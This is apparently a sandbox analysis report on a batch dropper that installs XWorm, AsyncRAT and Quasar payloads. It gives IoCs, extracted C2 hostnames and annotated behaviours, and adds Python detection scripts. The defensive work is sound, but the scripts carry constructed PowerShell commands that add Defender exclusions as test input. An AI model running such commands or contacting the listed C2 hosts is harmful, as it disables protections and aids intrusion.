Analysis
max time kernel: 1049s
max time network: 1048s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29-06-2024 20:11
Static task: static1
General
Target: Output.bat
Size: 1.1MB
MD5: 1897b3980473ad054ab05b0f2ced4de7
SHA1: a694b444dc8dd30e07f69671c3905ffb6fe13532
SHA256: 3d25b09ab5a16a6b49a7394175b3bce37ba2ae9ce8771408b05280b1bd14b036
SHA512: 6f67fe1aca76aa0ff33ebf7f1edc4bae6b25c34c543ffa8f59220e520dea91fe92bd50681a5d3086353ef245bd28887bca93efa276ad2544dfbdbdd188ba5ee1
SSDEEP: 24576:H9/ZDtETtFPa65VkOdET4sDgnVI4jGzwMVACzrDc:HqRcRBkwAGM
Malware Config
Extracted: xworm
- best-bird.gl.at.ply.gg:27196
- super-nearest.gl.at.ply.gg:17835
Extracted: asyncrat
- Default
- finally-grande.gl.at.ply.gg:25844
- delay: 1
- install: false
- install_folder: %AppData%
All three C2 endpoints are *.gl.at.ply.gg hostnames, i.e. playit.gg tunnel endpoints; the resolved IP is the tunnel provider's and can change, so block and alert on the hostname:port pairs rather than on addresses. The AsyncRAT build has install=false, so that payload does not copy itself to install_folder for persistence in this configuration.
Signatures
Detect Xworm Payload (4 IoCs)
Processes:
resource / yara_rule
- C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe  family_xworm
- behavioral1/memory/4996-219-0x0000000000DE0000-0x0000000000DF8000-memory.dmp  family_xworm
- C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe  family_xworm
- behavioral1/memory/2360-237-0x00000000007A0000-0x00000000007BA000-memory.dmp  family_xworm
The two memory dumps come from pids 4996 (mshta.exe) and 2360 (svchost.exe), the same processes listed under "Executes dropped EXE" below: both the dropped files on disk and the running processes matched the XWorm rule.
Modifies firewall policy service (3 TTPs, 3 IoCs)
Processes: svchost.exe
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules (svchost.exe)
- Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{1A280F62-479D-4C75-BCF5-F49586D9CB43} = "v2.30|Action=Block|Active=TRUE|Dir=In|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" (svchost.exe)
- Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{46180BB6-C69C-4461-B788-35D602E3D2C8} = "v2.30|Action=Block|Active=TRUE|Dir=Out|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" (svchost.exe)
Both rules are scoped to the Microsoft Edge AppContainer package SID (AppPkgId) and the sandbox user's SID (LUOwn) and sit under the AppIso (app isolation) rule set; neither references the dropped payloads. That is consistent with the Windows Firewall service's own per-app-container bookkeeping while msedge.exe ran in the sandbox (see the msedge.exe entries further down), not with the implant opening or closing ports. Before attributing these writes to the sample, confirm which svchost.exe instance made them: the dropped C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe is pid 2360, whereas the firewall service runs inside a genuine C:\Windows\System32\svchost.exe.
Modifies security service (2 TTPs, 4 IoCs)
Processes: svchost.exe
- Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs (svchost.exe)
- Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|" (svchost.exe)
- Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\PolicyVersion = "542" (svchost.exe)
- Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|D=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\|PFN=Microsoft.MicrosoftEdge.Stable_92.0.902.67_neutral__8wekyb3d8bbwe|" (svchost.exe)
These AppCs entries are keyed by the same Edge package SID and user SID as the firewall rules above and record Edge's package family name, moniker and install directory; mpssvc is the Windows Firewall service, so this is the service registering the Edge app container rather than the sample tampering with security settings.
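The two sections above both consist of pipe-delimited "v2.30|Key=Value|..." strings, and the useful triage question is what each Block rule actually applies to. The parser below, added here as an example and not code from the sandbox, the sample or Microsoft, splits those strings and links the FirewallRules entries to the AppCs package record by AppPkgId. The registry values are copied from this report; the function names are the example's own, and the backslashes in the D= field are un-doubled from the report's escaped rendering (an assumption about how the report prints them).

```python
"""Parse the 'v2.30|Key=Value|...' strings the Windows Firewall service (mpssvc)
stores under FirewallPolicy\...\FirewallRules and mpssvc\Parameters\AppCs, and
tie active Block rules back to the app package they apply to.

Added example for this report; not code from the sandbox, the sample or
Microsoft. Registry values are copied from the report; function names are
this example's own; backslashes in D= are un-doubled (assumption)."""

from typing import Dict, List

EDGE_PKG = ("S-1-15-2-543634040-274359014-2226501544-3561766748-"
            "3991453649-3543631192-522786984")
OWNER = "S-1-5-21-1337824034-2731376981-3755436523-1000"

# Values from the report's FirewallRules key (GUID -> rule string).
FIREWALL_RULES: Dict[str, str] = {
    "{1A280F62-479D-4C75-BCF5-F49586D9CB43}": (
        "v2.30|Action=Block|Active=TRUE|Dir=In|Name=Microsoft Edge|"
        "Desc=Microsoft Edge Browser|LUOwn=%s|AppPkgId=%s|EmbedCtxt=Microsoft Edge|"
        % (OWNER, EDGE_PKG)),
    "{46180BB6-C69C-4461-B788-35D602E3D2C8}": (
        "v2.30|Action=Block|Active=TRUE|Dir=Out|Name=Microsoft Edge|"
        "Desc=Microsoft Edge Browser|LUOwn=%s|AppPkgId=%s|EmbedCtxt=Microsoft Edge|"
        % (OWNER, EDGE_PKG)),
}

# The fuller of the two AppCs values from the report's mpssvc section.
APPCS_VALUE = (
    "v2.30|AppPkgId=%s|LUOwn=%s|"
    "C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|"
    "M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|"
    "Desc=Microsoft Edge Browser|D=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\|"
    "PFN=Microsoft.MicrosoftEdge.Stable_92.0.902.67_neutral__8wekyb3d8bbwe|"
    % (EDGE_PKG, OWNER))


def parse_rule(value: str) -> Dict[str, str]:
    """Split a rule string into a dict. The first token is the schema version
    ('v2.30'); every later token is Key=Value. Values in this format do not
    contain '|', so a plain split is safe."""
    tokens = [t for t in value.split("|") if t]
    if not tokens or not (tokens[0].startswith("v") and tokens[0][1:2].isdigit()):
        raise ValueError("not a firewall rule string: %r" % value[:40])
    rule = {"Version": tokens[0]}
    for tok in tokens[1:]:
        key, _, val = tok.partition("=")
        rule[key] = val
    return rule


def active_block_rules(rules: Dict[str, str]) -> List[Dict[str, str]]:
    """Return the rules that currently block traffic, with the fields an
    analyst needs to decide what each one constrains."""
    out = []
    for guid, raw in rules.items():
        r = parse_rule(raw)
        if r.get("Action") == "Block" and r.get("Active", "").upper() == "TRUE":
            out.append({
                "guid": guid,
                "Dir": r.get("Dir", ""),
                "Name": r.get("Name", ""),
                # Ordinary rules name a program path in App=; AppContainer
                # rules carry the package SID in AppPkgId= instead.
                "target": r.get("App") or r.get("AppPkgId", ""),
            })
    return out


def rules_for_package(rules: Dict[str, str], pkg_sid: str) -> List[str]:
    """GUIDs of the rules scoped to one AppContainer package SID."""
    return sorted(g for g, raw in rules.items()
                  if parse_rule(raw).get("AppPkgId") == pkg_sid)


def describe_package(appcs_value: str) -> Dict[str, str]:
    """Parse an AppCs entry: M= is the package moniker, PFN= the package
    family name, D= the install directory."""
    pkg = parse_rule(appcs_value)
    if "AppPkgId" not in pkg:
        raise ValueError("AppCs entry without AppPkgId")
    return pkg


if __name__ == "__main__":
    pkg = describe_package(APPCS_VALUE)
    for r in active_block_rules(FIREWALL_RULES):
        scope = r["target"]
        if scope == pkg["AppPkgId"]:
            scope = "package %s at %s" % (pkg["M"], pkg["D"])
        print("%s %-3s Block %s -> %s" % (r["guid"], r["Dir"], r["Name"], scope))
```

Run stand-alone, the script prints both GUIDs as inbound and outbound Block rules resolved to the Edge package and its Program Files directory, which is the evidence that they constrain Edge's app container and not the dropped binaries. A rule whose target resolved to a path under C:\Windows\System32\WindowsPowerShell\v1.0 would be the case worth escalating.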
Quasar payload (1 IoCs)
Processes:
resource / yara_rule
- C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe  family_quasar
Async RAT payload (1 IoCs)
Processes:
resource / yara_rule
- C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe  family_asyncrat
Three families were dropped by the one batch file: hat.exe matched the Quasar rule, ONPE.exe the AsyncRAT rule, and mshta.exe and svchost.exe the XWorm rule. Only the XWorm and AsyncRAT configurations were extracted (see Malware Config above), so this report gives no C2 for the Quasar payload.
Command and Scripting Interpreter: PowerShell (1 TTPs, 7 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes (pid / process):
- 856 powershell.exe
- 3740 powershell.exe
- 2688 powershell.exe
- 4664 powershell.exe
- 620 powershell.exe
- 2652 powershell.exe
- 2736 powershell.exe
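The report records that seven PowerShell instances changed Defender exclusions but not the command lines they ran, and in practice such commands often arrive base64-encoded behind -EncodedCommand, where a plain string match never fires. The scanner below is an added example, not code from the sandbox or the sample: it decodes any -EncodedCommand argument (UTF-16LE base64, accepting the abbreviated -e/-enc forms PowerShell allows), then extracts every -ExclusionPath, -ExclusionExtension and -ExclusionProcess value passed to Add-MpPreference or Set-MpPreference. The cmdlet and parameter names are real; the three sample command lines are constructed for the example and are not the sample's own.

```python
"""Find Windows Defender exclusion changes in PowerShell command lines,
including ones hidden behind -EncodedCommand.

Added example for this report; not sandbox or sample code. The report names
seven powershell.exe pids (856, 3740, 2688, 4664, 620, 2652, 2736) but no
command lines, so SAMPLE_CMDLINES below are constructed. Add-MpPreference,
Set-MpPreference, -Exclusion{Path,Extension,Process} and -EncodedCommand are
real PowerShell names."""

import base64
import re
from typing import List, Tuple

CMDLET_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.I)
# A value is a single-quoted string, a double-quoted string or a bare token;
# PowerShell accepts several as a comma-separated array.
_TOKEN = r"""'[^']*'|"[^"]*"|[^\s,;|"']+"""
TOKEN_RE = re.compile(_TOKEN)
EXCL_RE = re.compile(
    r"-Exclusion(Path|Extension|Process)\s+((?:%s)(?:\s*,\s*(?:%s))*)" % (_TOKEN, _TOKEN),
    re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...).
ENC_RE = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)


def normalise(cmdline: str) -> str:
    """Inline the plaintext of every -EncodedCommand argument (base64 of
    UTF-16LE) so that later matching sees the real script."""
    out = cmdline
    for m in ENC_RE.finditer(cmdline):
        flag, b64 = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy: starts with 'e' but is not -enc
        try:
            script = base64.b64decode(b64, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64/UTF-16LE, leave the argument alone
        out = out.replace(m.group(0), "-EncodedCommand [decoded] %s [end]" % script)
    return out


def find_exclusions(cmdline: str) -> List[Tuple[str, str]]:
    """Return (kind, value) pairs for every exclusion the command line adds;
    kind is 'Path', 'Extension' or 'Process'. Empty when no Defender
    preference cmdlet is present."""
    text = normalise(cmdline)
    if not CMDLET_RE.search(text):
        return []
    found = []
    for m in EXCL_RE.finditer(text):
        kind = m.group(1).capitalize()
        for tok in TOKEN_RE.findall(m.group(2)):
            found.append((kind, tok.strip("'\"")))
    return found


def scan(cmdlines: List[str]) -> List[Tuple[str, List[Tuple[str, str]]]]:
    """Command lines that add exclusions, paired with what they exclude."""
    hits = []
    for c in cmdlines:
        ex = find_exclusions(c)
        if ex:
            hits.append((c, ex))
    return hits


# Constructed sample input (not from the report).
_ENCODED = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\Users\\Public'".encode("utf-16le")).decode()
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -c \"Add-MpPreference -ExclusionExtension 'exe','bat' "
    "-ExclusionProcess 'svchost.exe'\"",
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -enc " + _ENCODED,
    "powershell.exe -Command Get-MpPreference",  # benign read, must not match
]

if __name__ == "__main__":
    for cmd, ex in scan(SAMPLE_CMDLINES):
        print(cmd[:60], "->", ex)
```

Point this at Sysmon event 1 / 4688 command lines or ScriptBlock logging (event 4104), where the decoded script is already available and normalise() is a no-op. Exclusions for the directory the payloads were dropped into, or for the names svchost.exe and mshta.exe, are the high-confidence hits.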
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: WScript.exe, mshta.exe, svchost.exe
- Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (mshta.exe)
- Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (svchost.exe)
Executes dropped EXE (4 IoCs)
Processes (pid / process):
- 744 hat.exe
- 4996 mshta.exe
- 4332 ONPE.exe
- 2360 svchost.exe
All four run from C:\Windows\System32\WindowsPowerShell\v1.0\, where powershell.exe wrote them (see "Drops file in System32 directory" below). mshta.exe and svchost.exe there are the dropped payloads borrowing Windows binary names; the genuine binaries live in C:\Windows\System32\ and C:\Windows\SysWOW64\.
Enumerates connected drives (3 TTPs, 23 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes: svchost.exe
File opened (read-only) by svchost.exe, in the order recorded: \??\B:, \??\K:, \??\M:, \??\Z:, \??\A:, \??\O:, \??\R:, \??\W:, \??\E:, \??\J:, \??\N:, \??\P:, \??\Q:, \??\S:, \??\T:, \??\Y:, \??\H:, \??\I:, \??\L:, \??\U:, \??\V:, \??\X:, \??\G:
(every letter A: to Z: except C:, D: and F:)
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 5: ip-api.com
Drops file in System32 directory (43 IoCs)
Processes: svchost.exe, svchost.exe, svchost.exe, svchost.exe, powershell.exe, svchost.exe
Dropped payloads (powershell.exe):
- File created C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe (powershell.exe)
- File created C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe (powershell.exe)
- File created C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe (powershell.exe)
- File created C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe (powershell.exe)
Other writes (svchost.exe), in the order recorded:
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx
- File created C:\Windows\system32\wdi\LogFiles\StartupInfo\S-1-5-21-1337824034-2731376981-3755436523-1000_StartupInfo3.xml
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx
- File opened for modification C:\Windows\system32\SRU\SRU.log
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
- File opened for modification C:\Windows\system32\SRU\SRUDB.jfm
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
- File created C:\Windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{518e6335-aaed-4471-8c1b-13da3e76dbf8}\snapshot.etl
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx
- File opened for modification C:\Windows\system32\SRU\SRUDB.dat
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx
- File opened for modification C:\Windows\system32\WDI\BootPerformanceDiagnostics_SystemData.bin
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx
- File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF
- File opened for modification C:\Windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{518e6335-aaed-4471-8c1b-13da3e76dbf8}\snapshot.etl
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan
- File opened for modification C:\Windows\system32\SRU\SRU.chk
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx
- File opened for modification C:\Windows\system32\WDI\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-1337824034-2731376981-3755436523-1000_UserData.bin
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
- File created C:\Windows\system32\NDF\{E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC}-temp-06292024-2013.etl
- File opened for modification C:\Windows\system32\NDF\{E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC}-temp-06292024-2013.etl
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnostics-Networking%4Operational.evtx
The svchost.exe writes are Windows housekeeping (CryptnetUrlCache, SRUM, WDI/NDF diagnostics, scheduled-task state, event logs); the four powershell.exe file creates are the payload drop. Writing into C:\Windows\System32\WindowsPowerShell\v1.0 needs administrative rights, so the sample ran elevated in the sandbox; on a non-admin host these writes would fail.
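The drop-and-execute pattern above is a good detection target independent of the payload family: a script host writing executables into a System32 subdirectory, followed by processes whose image name matches a Windows binary (svchost.exe, mshta.exe) but whose directory is not where Windows ships that binary. The checker below, added here as an example and not code from the sandbox or the sample, runs both rules over a small event stream and correlates each masquerading process back to the file-create that produced it. The eight report-derived events reuse the paths and pids printed above; the three benign control events and the event field names are constructed for the example.

```python
"""Flag executables dropped into System32 by a script host and processes that
borrow a Windows system-binary name from the wrong directory.

Added example for this report; not sandbox or sample code. Events marked
'from report' reuse paths/pids printed in the report; the benign controls and
the event schema (type/path/image/process/pid) are constructed."""

import ntpath
from typing import Dict, Iterable, List

# Directories that legitimately hold each impersonated binary (lower-case;
# Windows paths are case-insensitive). Extend as needed for your estate.
EXPECTED_DIRS = {
    "svchost.exe":    {r"c:\windows\system32", r"c:\windows\syswow64"},
    "mshta.exe":      {r"c:\windows\system32", r"c:\windows\syswow64"},
    "powershell.exe": {r"c:\windows\system32\windowspowershell\v1.0",
                       r"c:\windows\syswow64\windowspowershell\v1.0"},
    "explorer.exe":   {r"c:\windows"},
}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def split_path(path: str):
    """(directory, basename), both lower-cased, using Windows path rules."""
    d, b = ntpath.split(path)
    return d.lower().rstrip("\\"), b.lower()


def is_masquerade(image: str) -> bool:
    """True when the basename is a known system binary but the directory is
    not one of the locations Windows installs it in."""
    d, b = split_path(image)
    expected = EXPECTED_DIRS.get(b)
    return expected is not None and d not in expected


def dropped_into_system32(event: Dict) -> bool:
    """True for an .exe written under C:\\Windows\\System32 by a script host."""
    if event["type"] != "file_create":
        return False
    d, b = split_path(event["path"])
    return (b.endswith(".exe") and d.startswith(r"c:\windows\system32")
            and event["process"].lower() in SCRIPT_HOSTS)


def analyse(events: Iterable[Dict]) -> List[Dict]:
    """Run both rules in stream order; a masquerade finding records which
    process created the image, when that create was seen earlier."""
    findings, created_by = [], {}
    for e in events:
        if e["type"] == "file_create":
            created_by[e["path"].lower()] = e["process"]
            if dropped_into_system32(e):
                findings.append({"rule": "script_host_drops_exe_in_system32",
                                 "path": e["path"], "process": e["process"]})
        elif e["type"] == "process_start" and is_masquerade(e["image"]):
            findings.append({"rule": "masquerading_system_binary",
                             "path": e["image"], "pid": e["pid"],
                             "dropped_by": created_by.get(e["image"].lower(), "")})
    return findings


_V1 = r"C:\Windows\System32\WindowsPowerShell\v1.0"
SAMPLE_EVENTS = [
    # from report: the four payload drops (writer pid not recorded -> 0)
    {"type": "file_create", "path": _V1 + r"\hat.exe", "process": "powershell.exe", "pid": 0},
    {"type": "file_create", "path": _V1 + r"\mshta.exe", "process": "powershell.exe", "pid": 0},
    {"type": "file_create", "path": _V1 + r"\ONPE.exe", "process": "powershell.exe", "pid": 0},
    {"type": "file_create", "path": _V1 + r"\svchost.exe", "process": "powershell.exe", "pid": 0},
    # from report: their execution
    {"type": "process_start", "image": _V1 + r"\hat.exe", "process": "hat.exe", "pid": 744},
    {"type": "process_start", "image": _V1 + r"\mshta.exe", "process": "mshta.exe", "pid": 4996},
    {"type": "process_start", "image": _V1 + r"\ONPE.exe", "process": "ONPE.exe", "pid": 4332},
    {"type": "process_start", "image": _V1 + r"\svchost.exe", "process": "svchost.exe", "pid": 2360},
    # constructed benign controls (pids 1000/1001 are made up)
    {"type": "process_start", "image": r"C:\Windows\System32\svchost.exe", "process": "svchost.exe", "pid": 1000},
    {"type": "process_start", "image": _V1 + r"\powershell.exe", "process": "powershell.exe", "pid": 2652},
    {"type": "file_create", "path": r"C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF",
     "process": "svchost.exe", "pid": 1001},
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f)
```

On the sample stream the first rule fires four times (hat.exe, mshta.exe, ONPE.exe, svchost.exe) and the second twice (pids 4996 and 2360, both traced back to powershell.exe); the genuine svchost.exe, the genuine powershell.exe and the .PNF write produce nothing. hat.exe and ONPE.exe are caught only by the first rule, which is why both are worth keeping.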
Drops file in Windows directory (3 IoCs)
Processes: Explorer.EXE, svchost.exe
- File created C:\Windows\INF\netsstpa.PNF (Explorer.EXE)
- File created C:\Windows\INF\netrasa.PNF (Explorer.EXE)
- File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk (svchost.exe)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL (1 TTPs, 6 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes: netsh.exe, netsh.exe
- Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
All six IoCs are reads of HKLM\SOFTWARE\Microsoft\NetSh by two netsh.exe instances, which is what netsh does on every start to load its registered helper DLLs. No value under that key is written here, so the report shows that netsh was run, not that a helper DLL was registered for persistence; the thing to hunt for on a live host is a non-Microsoft DLL path among the values of that key.
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: svchost.exe, svchost.exe
- Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (svchost.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier (svchost.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier (svchost.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (svchost.exe)
- Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (svchost.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (svchost.exe)
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: msedge.exe
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
Processes: Explorer.EXE
- Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch (Explorer.EXE)
- Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" (Explorer.EXE)
- Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Internet Explorer\IESettingSync (Explorer.EXE)
- Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" (Explorer.EXE)
Modifies data under HKEY_USERS (14 IoCs)
Processes: svchost.exe, svchost.exe, svchost.exe, svchost.exe
- Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client" (svchost.exe)
- Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad (svchost.exe)
